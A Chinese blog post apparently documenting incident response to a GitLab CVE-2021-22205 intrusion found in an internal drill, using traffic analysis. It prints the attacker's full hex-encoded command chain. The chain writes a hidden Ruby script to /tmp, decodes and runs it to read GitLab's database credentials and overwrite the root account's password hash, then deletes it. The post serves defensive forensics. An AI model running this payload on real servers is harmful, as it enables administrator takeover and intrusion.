一篇文章教你如何gitlab应急响应

原创

Vista_Ax 2023-06-25 18:34:13 博主文章分类：应急响应 ©著作权

文章标签 git 3d IP 文章分类 网络安全 yyds干货盘点

©著作权归作者所有：来自51CTO博客作者Vista_Ax的原创作品，如需转载，请与作者联系，否则将追究法律责任

01 事件背景介绍

某内部应急演练中，态势感知平台上出现gitlab RCE漏洞入侵成功告警，现需根据流量情况进行安全事件分析。

02 事件分析过程

根据态势感知平台，确认发起入侵的IP地址，以该地址为源地址进行搜索，寻找入侵痕迹及路径。通过流量分析，判断入侵者首先尝试使用弱口令登陆gitlab，从响应状态判断弱口令没有登陆成功。

一篇文章教你如何gitlab应急响应_git

在后续的流量发现存在422响应包，进一步分析入侵者使用gitlab RCE漏洞（CVE-2021-22205）对80.X.X.60成功发起入侵：

一篇文章教你如何gitlab应急响应_IP_02

入侵者写入恶意脚本/tmp/.JARRLTW.rb，并执行，成功执行后删除脚本

echo -n 72657175697265202779616d6c270a7265717569726520277067270a636f6e666967203d2059414d4c3a3a6c6f61645f6669 >> /tmp/.JARRLTW.rb
echo -n 6c6528272f7661722f6f70742f6769746c61622f6769746c61622d7261696c732f6574632f64617461626173652e796d6c27 >> /tmp/.JARRLTW.rb
echo -n 295b2770726f64756374696f6e275d0a636f6e6e203d2050472e636f6e6e65637428636f6e6669675b27686f7374275d2c20 >> /tmp/.JARRLTW.rb
echo -n 636f6e6669675b27706f7274275d2c2027272c2027272c20636f6e6669675b276461746162617365275d2c20636f6e666967 >> /tmp/.JARRLTW.rb
echo -n 5b27757365726e616d65275d2c20636f6e6669675b2770617373776f7264275d290a636f6e6e2e6578656328277570646174 >> /tmp/.JARRLTW.rb
echo -n 652075736572732073657420636f6e6669726d6174696f6e5f746f6b656e3d2873656c65637420656e637279707465645f70 >> /tmp/.JARRLTW.rb
echo -n 617373776f72642066726f6d20757365727320776865726520757365726e616d653d5c27726f6f745c27292c656e63727970 >> /tmp/.JARRLTW.rb
echo -n 7465645f70617373776f72643d5c272432612431302436386857326461516b544678614c5478663538427a75744c54414263 >> /tmp/.JARRLTW.rb
echo -n 456264506e633058324451522f4d6946306658744157344f475c272c73746174653d5c276163746976655c27207768657265 >> /tmp/.JARRLTW.rb
echo -n 20757365726e616d653d5c27726f6f745c273b2729 >> /tmp/.JARRLTW.rb
cat /tmp/.JARRLTW.rb | xxd -r -p | tee /tmp/.JARRLTW.rb
/opt/gitlab/embedded/bin/ruby /tmp/.JARRLTW.rb
/usr/bin/rm -rf /tmp/.JARRLTW.rb

还原脚本，具体代码如下图所示

一篇文章教你如何gitlab应急响应_git_03